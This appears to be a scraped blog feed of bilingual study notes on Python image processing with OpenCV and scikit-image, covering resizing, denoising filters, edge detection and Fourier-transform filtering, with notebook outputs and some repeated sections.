    缩放

    import cv2
    import matplotlib.pyplot as plt

    img = cv2.imread('images/RGBY.jpg', 1)
    resized = cv2.resize(img, None, fx=2, fy=2, interpolation=cv2.INTER_CUBIC)

    cv2.imshow('original pic', img)
    cv2.imshow('resized pic', resized)
    cv2.waitKey(0)
    cv2.destroyAllWindows()

    png

    img.shape
    (400, 200, 3)
    print('Top left', img[0, 0])
    print('Top right', img[0, -1])
    print('Bottom left', img[-1, 0])
    print('Bottom right', img[-1, -1])
    Top left [254   0   0]Top right [  1 255 255]Bottom left [  1 255   0]Bottom right [ 42   0 255]

    分离颜色通道

    blue = img[:, :, 0]
    green = img[:, :, 1]
    red = img[:, :, 2]

    blue, green, red = cv2.split(img)
    cv2.imshow('red pic', red)
    cv2.waitKey(0)
    cv2.destroyAllWindows()

    png

    合并颜色通道

    img_merged = cv2.merge((blue, green, red))

    cv2.imshow('merged pic', img_merged)
    cv2.waitKey(0)
    cv2.destroyAllWindows()

    png

    Canny 边缘检测

    import cv2

    img = cv2.imread('images/Osteosarcoma_01.tif', 0)
    edges = cv2.Canny(img, 100, 200)

    cv2.imshow('Original Image', img)
    cv2.imshow('Canny', edges)
    cv2.waitKey(0)
    cv2.destroyAllWindows()

    png

    Tutorial 31 - Image filtering in python - Unsharp mask

    Unsharp Mask(USM)锐化算法的的原理及其实现。_大熊背的博客-CSDN 博客_usm 锐化算法

    png

    $Unsharpened image = original + amount \times (original - blurred)$

    原理

    from skimage import io, img_as_float
    from skimage.filters import unsharp_mask
    from skimage.filters import gaussian

    img = img_as_float(io.imread('images/sandstone_blur_2sigma.tif', as_gray=True))
    gaussian_img = gaussian(img, sigma=2, mode='constant', cval=0.0)
    img2 = (img - gaussian_img) * 2.
    img3 = img + img2

    from matplotlib import pyplot as plt

    fig = plt.figure(figsize=(10, 10))

    ax1 = fig.add_subplot(131)
    ax1.imshow(img, cmap='gray')
    ax1.title.set_text('1st')

    ax2 = fig.add_subplot(132)
    ax2.imshow(img2, cmap='gray')
    ax2.title.set_text('img2')

    ax3 = fig.add_subplot(133)
    ax3.imshow(img3, cmap='gray')
    ax3.title.set_text('img3')

    plt.show()

    png

    unsharp_mask 函数

    from skimage import io
    from skimage.filters import unsharp_mask

    img = io.imread("images/sandstone_blur_2sigma.tif")

    #Radius defines the degree of blurring
    #Amount defines the multiplication factor for original - blurred image
    unsharped_img = unsharp_mask(img, radius=3, amount=2)


    import matplotlib.pyplot as plt
    fig = plt.figure(figsize=(12, 12))
    ax1 = fig.add_subplot(1,2,1)
    ax1.imshow(img, cmap='gray')
    ax1.title.set_text('Input Image')
    ax2 = fig.add_subplot(1,2,2)
    ax2.imshow(unsharped_img, cmap='gray')
    ax2.title.set_text('Unsharped Image')

    png

    Tutorial 32 - Image filtering in python - Gaussian denoising for noise reduction

    png

    import cv2
    from skimage import io, img_as_float
    from skimage.filters import gaussian

    img_gaussian_noise = img_as_float(io.imread('images/Osteosarcoma_01_25Sigma_noise.tif', as_gray=True))
    img_salt_pepper_noise = img_as_float(io.imread('images/Osteosarcoma_01_8bit_salt_pepper.tif', as_gray=True))

    img = img_gaussian_noise

    gaussian_using_cv2 = cv2.GaussianBlur(img, (3,3), 0, borderType=cv2.BORDER_CONSTANT)

    gaussian_using_skimage = gaussian(img, sigma=1, mode='constant', cval=0.0)
    #sigma defines the std dev of the gaussian kernel. SLightly different than
    #how we define in cv2


    cv2.imshow("Original", img)
    cv2.imshow("Using cv2gaussian", gaussian_using_cv2)
    cv2.imshow("Using skimage", gaussian_using_skimage)
    #cv2.imshow("Using scipy2", conv_using_scipy2)

    cv2.waitKey(0)
    cv2.destroyAllWindows()

    png

    Tutorial 33 - Image filtering in python - Median filter for denoising images

    • 中值滤波清理椒盐噪声

    png

    OpenCV

    import cv2
    # Needs 8 bit, not float.
    img_gaussian_noise = cv2.imread('images/Osteosarcoma_01_25Sigma_noise.tif', 0)
    img_salt_pepper_noise = cv2.imread('images/Osteosarcoma_01_8bit_salt_pepper_cropped.tif', 0)

    img = img_gaussian_noise

    median_using_cv2 = cv2.medianBlur(img, 3)

    skimage

    from skimage.filters import median
    from skimage.morphology import disk

    """
    Disk creates a circular structuring element,
    similar to a mask with specific radius
    Disk 创建一个圆形结构元素,类似于具有特定半径的掩码
    """
    disk(3)
    array([[0, 0, 0, 1, 0, 0, 0],       [0, 1, 1, 1, 1, 1, 0],       [0, 1, 1, 1, 1, 1, 0],       [1, 1, 1, 1, 1, 1, 1],       [0, 1, 1, 1, 1, 1, 0],       [0, 1, 1, 1, 1, 1, 0],       [0, 0, 0, 1, 0, 0, 0]], dtype=uint8)
    median_using_skimage = median(img, disk(3), mode='constant', cval=0.0)
    cv2.imshow('Original', img)
    cv2.imshow('cv2median', median_using_cv2)
    cv2.imshow('Using skimage median', median_using_skimage)

    cv2.waitKey(0)
    cv2.destroyAllWindows()

    png

    Tutorial 34 - Image filtering in python - Bilateral filter for image denoising

    双边滤波 - Bilateral Filter - 知乎 (zhihu.com)

    OpenCV

    import cv2

    img_gaussian_noise = cv2.imread('images/Osteosarcoma_01_25Sigma_noise.tif', 0)
    img = img_gaussian_noise
    bilateral_using_cv2 = cv2.bilateralFilter(img, 5, 20, 100, borderType=cv2.BORDER_CONSTANT)

    cv2.imshow("Original", img)
    cv2.imshow("cv2 bilateral", bilateral_using_cv2)
    cv2.waitKey(0)
    cv2.destroyAllWindows()

    png

    Skimage

    视频上说很慢…好像确实挺慢

    import cv2
    from skimage.restoration import denoise_bilateral

    img_gaussian_noise = cv2.imread('images/Osteosarcoma_01_25Sigma_noise.tif', 0)
    img = img_gaussian_noise
    bilateral_using_skimage = denoise_bilateral(img, sigma_color=0.05, sigma_spatial=15,
    multichannel=False)
    cv2.imshow("Using skimage bilateral", bilateral_using_skimage)
    cv2.waitKey(0)
    cv2.destroyAllWindows()

    png

    Tutorial 35 - Image filtering in python - Non-local means -NLM- filter for image denoising

    NLM 去噪算法_SongpingWang 的博客-CSDN 博客_nlm 去噪

    png

    OpenCV

    import cv2
    import numpy as np
    from skimage import io, img_as_float
    from skimage.restoration import denoise_nl_means, estimate_sigma

    img = img_as_float(io.imread('images/Osteosarcoma_01_25Sigma_noise.tif', as_gray=False))
    sigma_est = np.mean(estimate_sigma(img, multichannel=True)) # 从所有三个通道中选取 Sigma
    C:\Users\gzjzx\AppData\Local\Temp\ipykernel_11200\3289355486.py:7: FutureWarning: `multichannel` is a deprecated argument name for `estimate_sigma`. It will be removed in version 1.0. Please use `channel_axis` instead.  sigma_est = np.mean(estimate_sigma(img, multichannel=True))
    denoise_img = denoise_nl_means(img, h=1.15 * sigma_est, 
    fast_mode=True,
    patch_size=5,
    patch_distance=3,
    multichannel=False)
    C:\Users\gzjzx\AppData\Local\Temp\ipykernel_11200\4037562389.py:1: FutureWarning: `multichannel` is a deprecated argument name for `denoise_nl_means`. It will be removed in version 1.0. Please use `channel_axis` instead.  denoise_img = denoise_nl_means(img, h=1.15 * sigma_est, fast_mode=True,
    cv2.imshow("Original", img)
    cv2.imshow("NLM Filtered", denoise_img)
    cv2.waitKey(0)
    cv2.destroyAllWindows()

    Skimage

    from skimage import img_as_ubyte
    import cv2

    img_as_8btype = img_as_ubyte(img)
    denoise_img_as_8byte = img_as_ubyte(denoise_img)

    original_img = cv2.cvtColor(img_as_8btype, cv2.COLOR_BGR2RGB)
    final_denoised_img = cv2.cvtColor(denoise_img_as_8byte, cv2.COLOR_BGR2RGB)

    cv2.imshow("Original", img)
    cv2.imshow("NLM Filtered", denoise_img)
    cv2.waitKey(0)
    cv2.destroyAllWindows()

    png

    Tutorial 36 - Image filtering in python - Total variation filter -TVF- for image denoising

    如何理解全变分(Total Variation,TV)模型?- 知乎 (zhihu.com)

    import cv2
    from skimage import io, img_as_float
    from skimage.restoration import denoise_tv_chambolle

    img = img_as_float(io.imread('images/Osteosarcoma_01_25Sigma_noise.tif'))
    import matplotlib.pyplot as plt

    plt.hist(img.flat, bins=100, range=(0, 1))
    (array([3.26417e+05, 3.28804e+05, 2.18786e+05, 3.22133e+05, 2.09763e+05,        3.05641e+05, 1.95677e+05, 2.78984e+05, 1.75691e+05, 2.45767e+05,        2.25122e+05, 1.37699e+05, 1.89186e+05, 1.14683e+05, 1.55440e+05,        9.30000e+04, 1.23786e+05, 7.34830e+04, 9.66150e+04, 5.74190e+04,        7.61160e+04, 6.49060e+04, 3.82890e+04, 5.08860e+04, 2.99340e+04,        4.02660e+04, 2.39850e+04, 3.23250e+04, 1.93770e+04, 2.62200e+04,        2.38270e+04, 1.45560e+04, 1.99740e+04, 1.24720e+04, 1.74630e+04,        1.06820e+04, 1.50500e+04, 9.49200e+03, 1.31800e+04, 8.33400e+03,        1.13970e+04, 1.06840e+04, 6.63100e+03, 9.49100e+03, 5.84100e+03,        8.29500e+03, 5.25100e+03, 7.20200e+03, 4.53600e+03, 6.35800e+03,        5.76500e+03, 3.56300e+03, 4.89500e+03, 3.01000e+03, 4.29100e+03,        2.55100e+03, 3.53500e+03, 2.23300e+03, 3.10300e+03, 1.92100e+03,        2.55900e+03, 2.31500e+03, 1.38900e+03, 1.87300e+03, 1.18800e+03,        1.62500e+03, 9.85000e+02, 1.37700e+03, 8.49000e+02, 1.17400e+03,        1.06500e+03, 6.06000e+02, 8.26000e+02, 5.57000e+02, 7.52000e+02,        4.27000e+02, 5.95000e+02, 3.91000e+02, 4.85000e+02, 3.13000e+02,        4.03000e+02, 3.87000e+02, 2.18000e+02, 3.35000e+02, 1.88000e+02,        2.95000e+02, 1.65000e+02, 2.55000e+02, 1.36000e+02, 2.35000e+02,        1.82000e+02, 1.15000e+02, 1.68000e+02, 1.13000e+02, 1.63000e+02,        1.13000e+02, 1.63000e+02, 9.40000e+01, 1.32000e+02, 1.18000e+02]), array([0.  , 0.01, 0.02, 0.03, 0.04, 0.05, 0.06, 0.07, 0.08, 0.09, 0.1 ,        0.11, 0.12, 0.13, 0.14, 0.15, 0.16, 0.17, 0.18, 0.19, 0.2 , 0.21,        0.22, 0.23, 0.24, 0.25, 0.26, 0.27, 0.28, 0.29, 0.3 , 0.31, 0.32,        0.33, 0.34, 0.35, 0.36, 0.37, 0.38, 0.39, 0.4 , 0.41, 0.42, 0.43,        0.44, 0.45, 0.46, 0.47, 0.48, 0.49, 0.5 , 0.51, 0.52, 0.53, 0.54,        0.55, 0.56, 0.57, 0.58, 0.59, 0.6 , 0.61, 0.62, 0.63, 0.64, 0.65,        0.66, 0.67, 0.68, 0.69, 0.7 , 0.71, 0.72, 0.73, 0.74, 0.75, 0.76,        0.77, 0.78, 0.79, 0.8 , 0.81, 0.82, 0.83, 0.84, 0.85, 0.86, 0.87,        0.88, 0.89, 0.9 , 0.91, 0.92, 0.93, 0.94, 0.95, 0.96, 0.97, 0.98,        0.99, 1.  ]), <BarContainer object of 100 artists>)

    png

    • denoise_tv_chambolle(image, weight=0.1, eps=0.0002, n_iter_max=200, multichannel=False)
      • weight: The greater weight, the more denoising (at the expense of fidelity to input). 权重越大,去噪越多(以牺牲对输入的保真度为代价)。
      • eps: Relative difference of the value of the cost function that determines the stop criterion. 决定停止准则的代价函数值的相对差值。
      • n_iter_max: Max number of iterations used for optimization 用于优化的最大迭代次数
    denoise_img = denoise_tv_chambolle(img, weight=0.1, eps=0.0002, n_iter_max=200, multichannel=True)
    C:\Users\gzjzx\AppData\Local\Temp\ipykernel_8228\1044631449.py:1: FutureWarning: `multichannel` is a deprecated argument name for `denoise_tv_chambolle`. It will be removed in version 1.0. Please use `channel_axis` instead.  denoise_img = denoise_tv_chambolle(img, weight=0.1, eps=0.0002, n_iter_max=200, multichannel=True)
    cv2.imshow('Original', img)
    cv2.imshow('TV Filtered', denoise_img)
    cv2.waitKey(0)
    cv2.destroyAllWindows()

    png

    Tutorial 37 - Image filtering in python - Block matching and 3D filtering -BM3D- for image denoising

    BM3D 算法学习 - 知乎

    png

    pip install bm3d
    Collecting bm3d  Downloading bm3d-3.0.9-py3-none-any.whl (8.4 MB)     ---------------------------------------- 8.4/8.4 MB 2.3 MB/s eta 0:00:00Requirement already satisfied: PyWavelets in c:\users\gzjzx\anaconda3\lib\site-packages (from bm3d) (1.3.0)Requirement already satisfied: numpy in c:\users\gzjzx\anaconda3\lib\site-packages (from bm3d) (1.23.1)Requirement already satisfied: scipy in c:\users\gzjzx\anaconda3\lib\site-packages (from bm3d) (1.9.0)Installing collected packages: bm3dSuccessfully installed bm3d-3.0.9Note: you may need to restart the kernel to use updated packages.
    from skimage import io, img_as_float
    import bm3d
    import cv2

    noisy_img = img_as_float(io.imread("images/Osteosarcoma_01_25Sigma_noise.tif", as_gray=True))

    BM3D_denoised_image = bm3d.bm3d(noisy_img, sigma_psd=0.2, stage_arg=bm3d.BM3DStages.HARD_THRESHOLDING)
    • bm3d library is not well documented yet, but looking into source code…Bm3d 库还没有很好的文档化,但是查看源代码…
      • sigma_psd - noise standard deviation 噪声标准差
      • stage_arg: Determines whether to perform hard-thresholding or Wiener filtering. 确定是执行硬阈值还是维纳过滤。
      • stage_arg = BM3DStages.HARD_THRESHOLDING or BM3DStages.ALL_STAGES (slow but powerful)
        • BM3DStages。HARD_THRESHOLDING 或 BM3DStagesall_stage(缓慢但强大)

    All stages performs both hard thresholding and Wiener filtering. 所有阶段都执行硬阈值和维纳滤波。

    cv2.imshow("Original", noisy_img)
    cv2.imshow("Denoised", BM3D_denoised_image)
    cv2.waitKey(0)
    cv2.destroyAllWindows()

    png

    Tutorial 38 - Image filtering in python - Edge detection

    Edge Detection filters: 边缘检测滤波器

    • Roberts
      • Apply a horizontal and vertical filter one after the other. 依次使用 Horizontal 和 Vertical 滤镜。
      • Both filters are applied (convoluted) to the image. 两个过滤器都被应用到图像上(卷积)。
      • Computes the sum of the squares of the differences between diagonally adjacent pixels. 计算对角线相邻像素之间的差的平方和。
      • It highlights regions of high spatial which often correspond to edges. 它突出了高空间区域,通常对应于边缘。

    png

    • Sobel
      • Very similar to Roberts excerpt with a $3\times3$ operator. 与 Roberts 非常相似,只是使用了$3\times3$操作符

    png

    • Scharr
      • Typically used to identify gradients along the x-axis (dx=1, dy=0) and y-axis(dx=0, dy=1) independently. 通常用于分别识别沿 x 轴(dx=1, dy=0)和 y 轴(dx=0, dy=1)的梯度。
      • Performance is quite similar to Sobel filter. 其性能与 Sobel 滤波器非常相似。
    • Farid
      • Farid and Simoncelli propose to use a pair of kernels, one for interpolation and another for differentiation (similar to Sobel). Farid 和 Simoncelli 建议使用一对核,一个用于插值,另一个用于微分(类似于 Sobel)。
      • Fixed size kernels: $5\times5$ (interpolation) and $7\times7$ (differentiation) 固定大小的内核:$5\times5$(插值)和$7\times7$(分化)
    • Prewitt
      • The Prewitt operator is similar to Sobel, excerpt for the operator values.
      • Very fast, similar to Sobel.

    png

    import cv2

    img = cv2.imread('images/sandstone.tif', 0)

    png

    from skimage.filters import roberts, sobel, scharr, prewitt

    roberts_img = roberts(img)
    sobel_img = sobel(img)
    scharr_img = scharr(img)
    prewitt_img = prewitt(img)
    cv2.imshow("Roberts", roberts_img)
    cv2.imshow("Sobel", sobel_img)
    cv2.imshow("Scharr", scharr_img)
    cv2.imshow("Prewitt", prewitt_img)
    cv2.waitKey(0)
    cv2.destroyAllWindows()

    png

    Tutorial 39 - Image filtering in python - Edge detection using Canny

    • Multi stage algorithm for edge detection: 多阶段边缘检测算法
      • Step 1: Noise reduction - typically uses Gaussian (but any denoising can be used) 降噪-通常使用高斯(但也可以使用任何降噪)
      • Step 2: Gradient calculation - detect edges, typically along 4 directions, horizontal, vertical, and two diagonals. (e.g. use Sobel) 梯度计算-检测边缘,通常沿 4 个方向,水平,垂直和两个对角线。
        (如使用 Sobel)
      • Step 3: Non-maximum suppression - thin out edges by finding pixels with max value in the edge direction. 非最大抑制-通过在边缘方向上找到最大值像素来减少边缘。
      • Step 4: Double threshold - determines potential edges by double thresholding to obtain strong, weak and irrelevant pixels for edges. 双阈值-通过双阈值确定潜在的边缘,获得边缘的强、弱和无关像素。
      • Step 5: Edge tracking by hysteresis - covert weak edge pixels to strong based on neighboring pixels. 边缘跟踪的迟滞-隐藏弱边缘像素到强基于邻近像素。
    from skimage import io, filters, feature
    import matplotlib.pyplot as plt
    from skimage.color import rgb2gray
    import cv2
    import numpy as np


    img = cv2.imread('images/sandstone.tif', 0)

    #Canny
    canny_edge = cv2.Canny(img, 50, 80) #Supply Thresholds 1 and 2

    #Autocanny
    sigma = 0.3
    median = np.median(img)

    # apply automatic Canny edge detection using the computed median
    lower = int(max(0, (1.0 - sigma) * median))
    #Lower threshold is sigma % lower than median
    #If the value is below 0 then take 0 as the value

    upper = int(min(255, (1.0 + sigma) * median))
    #Upper threshold is sigma% higher than median
    #If the value is larger than 255 then take 255 a the value

    auto_canny = cv2.Canny(img, lower, upper)


    cv2.imshow("Canny", canny_edge)
    cv2.imshow("Auto Canny", auto_canny)
    cv2.waitKey(0)
    cv2.destroyAllWindows()

    png

    Tutorial 40 - What is Fourier transform and how is it relevant for image processing

    Fourier Transform 傅里叶变换

    png

    • Continuous 连续傅里叶变换

      $x=\int_{-\infty}^{\infty} X(t)\cdot e^{-j_{2\pi}ft}dt$

    • Discrete 离散傅里叶变换

      $x = \frac { 1 } { N } \Sigma ^ { N - 1 } _ { n = 0 } x ( { \color { Red } n } ) \cdot e ^ { - \frac { { \color {Blue}j _ {2 \pi } }kn } { N } } $

      • ${\color{Red}n}$: Input signal (pixel value)
      • ${\color{Blue}j_{2\pi}}$: Complex number

    代码

    • 创建一个正弦波
    import cv2
    import matplotlib.pyplot as plt
    import numpy as np
    # Generate a 2D sine wave image
    x = np.arange(256) # generate values from 0 to 255 (our image size)
    y = np.sin(2 * np.pi * x / 3) # calculate sine of x values
    # Divide by a smaller number above to increase the frequency.
    y += max(y) # offset sine wave by the max value to go out of negative range of sine

    # Generate a 256 * 256 image (2D array of the sine wave)
    # create 2-D array of sine-wave
    img = np.array([[y[j] * 127 for j in range(256)] for i in range(256)], dtype=np.uint8)
    plt.imshow(img)
    <matplotlib.image.AxesImage at 0x246a404a700>

    png

    # 改变频率
    # Generate a 2D sine wave image
    x = np.arange(256) # generate values from 0 to 255 (our image size)
    y = np.sin(2 * np.pi * x / 30) # calculate sine of x values
    # Divide by a smaller number above to increase the frequency.
    y += max(y) # offset sine wave by the max value to go out of negative range of sine

    # Generate a 256 * 256 image (2D array of the sine wave)
    # create 2-D array of sine-wave
    img = np.array([[y[j] * 127 for j in range(256)] for i in range(256)], dtype=np.uint8)

    plt.imshow(img)
    <matplotlib.image.AxesImage at 0x246a542f1c0>

    png

    OpenCV

    dft = cv2.dft(np.float32(img), flags=cv2.DFT_COMPLEX_OUTPUT)

    #Shift DFT. First check the output without the shift
    #Without shifting the data would be centered around origin at the top left
    #Shifting it moves the origin to the center of the image.
    dft_shift = np.fft.fftshift(dft)

    #Calculate magnitude spectrum from the DFT (Real part and imaginary part)
    #Added 1 as we may see 0 values and log of 0 is indeterminate
    magnitude_spectrum = 20 * np.log((cv2.magnitude(dft_shift[:, :, 0], dft_shift[:, :, 1]))+1)


    #As the spatial frequency increases (bars closer),
    #the peaks in the DFT amplitude spectrum move farther away from the origin

    #Center represents low frequency and the corners high frequency (with DFT shift).
    #To build high pass filter block center corresponding to low frequencies and let
    #high frequencies go through. This is nothing but an edge filter.
    fig = plt.figure(figsize=(12, 12))
    ax1 = fig.add_subplot(2,2,1)
    ax1.imshow(img)
    ax1.title.set_text('Input Image')
    ax2 = fig.add_subplot(2,2,2)
    ax2.imshow(magnitude_spectrum)
    ax2.title.set_text('FFT of image')
    plt.show()

    png

    右边图中,每一个点

    1)它到中点的距离描述的是频率

    2)中点到它的方向,是平面波的方向

    3)那一点的灰度值描述的是它的幅值

    img = cv2.imread('images/sandstone.tif', 0) # load an image
    dft = cv2.dft(np.float32(img), flags=cv2.DFT_COMPLEX_OUTPUT)
    dft_shift = np.fft.fftshift(dft)
    magnitude_spectrum = 20 * np.log((cv2.magnitude(dft_shift[:, :, 0], dft_shift[:, :, 1]))+1)

    fig = plt.figure(figsize=(12, 12))
    ax1 = fig.add_subplot(2,2,1)
    ax1.imshow(img)
    ax1.title.set_text('Input Image')
    ax2 = fig.add_subplot(2,2,2)
    ax2.imshow(magnitude_spectrum)
    ax2.title.set_text('FFT of image')
    plt.show()

    png

    Tutorial 41 - Image filtering using Fourier transform in python

    import cv2
    from matplotlib import pyplot as plt
    import numpy as np

    img = cv2.imread('images/sandstone.tif', 0) # load an image
    • Output is a 2D complex array. 1st channel real and 2nd imaginary
      • 输出是一个 2D 复数数组。第一通道是实通道,第二通道是虚通道
    • For fft in opencv input image needs to be converted to float32
      • 对于 fft 在 opencv 输入图像需要转换为 float32
    dft = cv2.dft(np.float32(img), flags=cv2.DFT_COMPLEX_OUTPUT)
    • Rearranges a Fourier transform X by shifting the zero-frequency component to the center of the array.
      • 通过将零频率分量移到数组的中心来重新排列傅里叶变换 X。
    • Otherwise it starts at the tope left corenr of the image (array)
      • 否则它将从图像(数组)的左核心位置开始
    dft_shift = np.fft.fftshift(dft)
    • Magnitude of the function is 20.log(abs(f))
      • 函数的大小为 20.log(abs(f))
    • For values that are 0 we may end up with indeterminate values for log.
      • 对于 0 的值,我们可能会得到 log 的不确定值。
    • So we can add 1 to the array to avoid seeing a warning.
      • 因此,我们可以向数组中添加 1 以避免看到警告。
    magnitude_spectrum = 20 * np.log(cv2.magnitude(dft_shift[:, :, 0], dft_shift[:, :, 1]))
    • 使用傅里叶变换进行边缘检测

    • Circular HPF mask, center circle is 0, remaining all ones

      • 圆形 HPF 掩码,中心圆为 0,其余均为 1
    • Can be used for edge detection because low frequencies at center are blocked and only high frequencies are allowed.

      • 可以用于边缘检测,因为中心的低频被阻挡,只允许高频。
    • Edges are high frequency components.

      • 边是高频分量。
    • Amplifies noise.

      • 放大噪声。
    rows, cols = img.shape
    crow, ccol = int(rows / 2), int(cols / 2)

    mask = np.ones((rows, cols, 2), np.uint8)
    r = 80
    center = [crow, ccol]
    x, y = np.ogrid[:rows, :cols]
    mask_area = (x - center[0]) ** 2 + (y - center[1]) ** 2 <= r*r
    mask[mask_area] = 0
    • apply mask and inverse DFT: Multiply fourier transformed image (values) with the mask values.
      • 应用掩模和反 DFT:将傅里叶变换后的图像(值)与掩模值相乘。
    fshift = dft_shift * mask
    • Get the magnitude spectrum (only for plotting purposes)
      • 获取幅度谱(仅用于绘图目的)
    fshift_mask_mag = 20 * np.log(cv2.magnitude(fshift[:, :, 0], fshift[:, :, 1]))
    C:\Users\gzjzx\AppData\Local\Temp\ipykernel_19060\199016683.py:1: RuntimeWarning: divide by zero encountered in log  fshift_mask_mag = 20 * np.log(cv2.magnitude(fshift[:, :, 0], fshift[:, :, 1]))
    • Inverse shift to shift origin back to top left.
      • 反向移位将原点移回左上角。
    f_ishift = np.fft.ifftshift(fshift)
    • Inverse DFT to convert back to image domain from the frequency domain.
      • 逆 DFT: 从频域转换回图像域。
    • Will be complex numbers
      • 会是复数
    img_back = cv2.idft(f_ishift)
    • Magnitude spectrum of the image domain
      • 图像域的幅度谱
    img_back = cv2.magnitude(img_back[:, :, 0], img_back[:, :, 1])
    • 绘图
    fig = plt.figure(figsize=(12, 12))
    ax1 = fig.add_subplot(2,2,1)
    ax1.imshow(img, cmap='gray')
    ax1.title.set_text('Input Image')
    ax2 = fig.add_subplot(2,2,2)
    ax2.imshow(magnitude_spectrum, cmap='gray')
    ax2.title.set_text('FFT of image')
    ax3 = fig.add_subplot(2,2,3)
    ax3.imshow(fshift_mask_mag, cmap='gray')
    ax3.title.set_text('FFT + Mask')
    ax4 = fig.add_subplot(2,2,4)
    ax4.imshow(img_back, cmap='gray')
    ax4.title.set_text('After inverse FFT')
    plt.show()

    png

    • Circular LPF mask, center circle is 1, remaining all zeros
      • 圆形 LPF 掩码,中心圆为 1,其余均为零
    • Only allows low frequency components - smooth regions
      • 只允许低频组件-平滑区域
    • Can smooth out noise but blurs edges.
      • 可以消除噪音,但模糊边缘。
    rows, cols = img.shape
    crow, ccol = int(rows / 2), int(cols / 2)

    mask = np.zeros((rows, cols, 2), np.uint8)
    r = 100
    center = [crow, ccol]
    x, y = np.ogrid[:rows, :cols]
    mask_area = (x - center[0]) ** 2 + (y - center[1]) ** 2 <= r*r
    mask[mask_area] = 1

    # Band Pass Filter - Concentric circle mask, only the points living in concentric circle are ones
    rows, cols = img.shape
    crow, ccol = int(rows / 2), int(cols / 2)

    mask = np.zeros((rows, cols, 2), np.uint8)
    r_out = 80
    r_in = 10
    center = [crow, ccol]
    x, y = np.ogrid[:rows, :cols]
    mask_area = np.logical_and(((x - center[0]) ** 2 + (y - center[1]) ** 2 >= r_in ** 2),
    ((x - center[0]) ** 2 + (y - center[1]) ** 2 <= r_out ** 2))
    mask[mask_area] = 1
    fshift = dft_shift * mask
    fshift_mask_mag = 20 * np.log(cv2.magnitude(fshift[:, :, 0], fshift[:, :, 1]))
    f_ishift = np.fft.ifftshift(fshift)
    img_back = cv2.idft(f_ishift)
    img_back = cv2.magnitude(img_back[:, :, 0], img_back[:, :, 1])
    fig = plt.figure(figsize=(12, 12))
    ax1 = fig.add_subplot(2,2,1)
    ax1.imshow(img, cmap='gray')
    ax1.title.set_text('Input Image')
    ax2 = fig.add_subplot(2,2,2)
    ax2.imshow(magnitude_spectrum, cmap='gray')
    ax2.title.set_text('FFT of image')
    ax3 = fig.add_subplot(2,2,3)
    ax3.imshow(fshift_mask_mag, cmap='gray')
    ax3.title.set_text('FFT + Mask')
    ax4 = fig.add_subplot(2,2,4)
    ax4.imshow(img_back, cmap='gray')
    ax4.title.set_text('After inverse FFT')
    plt.show()
    C:\Users\gzjzx\AppData\Local\Temp\ipykernel_19060\2728092902.py:2: RuntimeWarning: divide by zero encountered in log  fshift_mask_mag = 20 * np.log(cv2.magnitude(fshift[:, :, 0], fshift[:, :, 1]))

    png

    ]]>
    + 正文

    Tutorial 29 -Basic image processing using scikit-image library

    缩放

    Rescale, resize, and downscale — skimage v0.19.2 docs

    • Rescale 操作按给定的缩放因子调整图像的大小。缩放因子可以是单个浮点值,也可以是多个值——每个轴上都有一个。
    • Resize 也有同样的作用,但允许指定输出图像的形状而不是缩放因子。
    • Downscale 的目的是通过整数因子对 n 维图像进行下采样,使用作为函数参数的大小因子的每个块的元素的局部均值。
    1
    2
    3
    from matplotlib import pyplot as plt
    from skimage import io, color
    from skimage.transform import rescale, resize, downscale_local_mean
    1
    2
    3
    4
    5
    img = io.imread('images/Osteosarcoma_01.tif', as_gray=True)  # 读取文件

    img_rescaled = rescale(img, 1.0 / 4.0, anti_aliasing=False) # 按比例缩放

    img_resized = resize(img, (200, 200), anti_aliasing=True) # 按大小缩放
    1
    plt.imshow(img, cmap='gray')
    <matplotlib.image.AxesImage at 0x212d8734a48>

    png

    1
    plt.imshow(img_rescaled, cmap='gray')
    <matplotlib.image.AxesImage at 0x212db1f7ac8>

    png

    1
    plt.imshow(img_resized, cmap='gray')
    <matplotlib.image.AxesImage at 0x212db2830c8>

    png

    1
    2
    img_downscaled = downscale_local_mean(img, (4, 3))  # 拉伸
    plt.imshow(img_downscaled, cmap='gray')
    <matplotlib.image.AxesImage at 0x212db506788>

    png

    gaussian 模糊

    1
    2
    3
    4
    5
    6
    from skimage import io
    from skimage.filters import gaussian, sobel
    img = io.imread("images/Osteosarcoma_01_25Sigma_noise.tif")
    plt.imshow(img)
    gaussian_using_skimage = gaussian(img, sigma=1, mode='constant', cval=0.0)
    plt.imshow(gaussian_using_skimage)
    C:\Users\gzjzx\anaconda3\envs\wxpython37\lib\site-packages\skimage\_shared\utils.py:348: RuntimeWarning: Images with dimensions (M, N, 3) are interpreted as 2D+RGB by default. Use `multichannel=False` to interpret as 3D image with last dimension of length 3.  return func(*args, **kwargs)<matplotlib.image.AxesImage at 0x212dbb52848>

    png

    sobel 边缘检测

    1
    2
    3
    img_gray = io.imread("images/Osteosarcoma_01.tif", as_gray=True)
    sobel_img = sobel(img_gray) #Works only on 2D (gray) images
    plt.imshow(sobel_img, cmap='gray')
    <matplotlib.image.AxesImage at 0x212dc0185c8>

    png
    ## Tutorial 30 - Basic image processing using opencv in python

    使用 OpenCV 操作下面这张图:

    jpg

    OpenCV 读取到的都是 BGR 颜色通道, 此时使用 matplotlib 显示会导致颜色发生变化

    1
    2
    3
    4
    5
    import cv2
    import matplotlib.pyplot as plt

    img = cv2.imread('images/RGBY.jpg', 1) # Color is BGR not RGB
    plt.imshow(img)
    <matplotlib.image.AxesImage at 0x1e3d6809370>

    png

    缩放

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    import cv2
    import matplotlib.pyplot as plt

    img = cv2.imread('images/RGBY.jpg', 1)
    resized = cv2.resize(img, None, fx=2, fy=2, interpolation=cv2.INTER_CUBIC)

    cv2.imshow('original pic', img)
    cv2.imshow('resized pic', resized)
    cv2.waitKey(0)
    cv2.destroyAllWindows()

    png

    1
    img.shape
    (400, 200, 3)
    1
    2
    3
    4
    print('Top left', img[0, 0])
    print('Top right', img[0, -1])
    print('Bottom left', img[-1, 0])
    print('Bottom right', img[-1, -1])
    Top left [254   0   0]Top right [  1 255 255]Bottom left [  1 255   0]Bottom right [ 42   0 255]

    分离颜色通道

    1
    2
    3
    blue = img[:, :, 0]
    green = img[:, :, 1]
    red = img[:, :, 2]

    1
    blue, green, red = cv2.split(img)
    1
    2
    3
    cv2.imshow('red pic', red)
    cv2.waitKey(0)
    cv2.destroyAllWindows()

    png

    合并颜色通道

    1
    2
    3
    4
    5
    img_merged = cv2.merge((blue, green, red))

    cv2.imshow('merged pic', img_merged)
    cv2.waitKey(0)
    cv2.destroyAllWindows()

    png

    Canny 边缘检测

    1
    2
    3
    4
    5
    6
    7
    8
    9
